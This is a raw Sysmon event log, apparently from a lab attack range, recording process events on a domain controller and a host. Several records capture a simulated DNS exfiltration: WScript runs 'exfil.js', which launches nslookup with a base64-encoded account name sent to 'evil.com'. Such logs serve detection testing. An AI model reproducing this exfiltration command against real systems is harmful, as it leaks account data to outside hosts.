10341000x8000000000000000215186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.068{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.068{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.052{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.052{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3246-000000005F02}3292C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.052{2E1864BB-18FE-629A-3046-000000005F02}61767884C:\Windows\system32\cmd.exe{2E1864BB-18FE-629A-3246-000000005F02}3292C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.067{2E1864BB-18FE-629A-3246-000000005F02}3292C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FE-629A-3046-000000005F02}6176C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrhcedh.tmp 2>&1 10341000x8000000000000000215180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.037{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3146-000000005F02}7716C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.037{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FE-629A-3146-000000005F02}7716C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.022{2E1864BB-18FE-629A-3146-000000005F02}77165740C:\Windows\system32\conhost.exe{2E1864BB-18FE-629A-3046-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.005{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3146-000000005F02}7716C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.005{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.005{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.005{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.005{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.005{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FE-629A-3046-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.005{2E1864BB-18E0-629A-6742-000000005F02}39765764C:\Windows\System32\WScript.exe{2E1864BB-18FE-629A-3046-000000005F02}6176C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.010{2E1864BB-18FE-629A-3046-000000005F02}6176C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrhcedh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:50.005{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlsdnr.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044892Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.987{0A5DF930-18FE-629A-3407-000000006002}18442944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044891Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18FE-629A-3407-000000006002}1844C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044890Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044889Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044888Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044887Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044886Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044885Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044884Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044883Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044882Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044881Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:50.800{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-18FE-629A-3407-000000006002}1844C:\Program 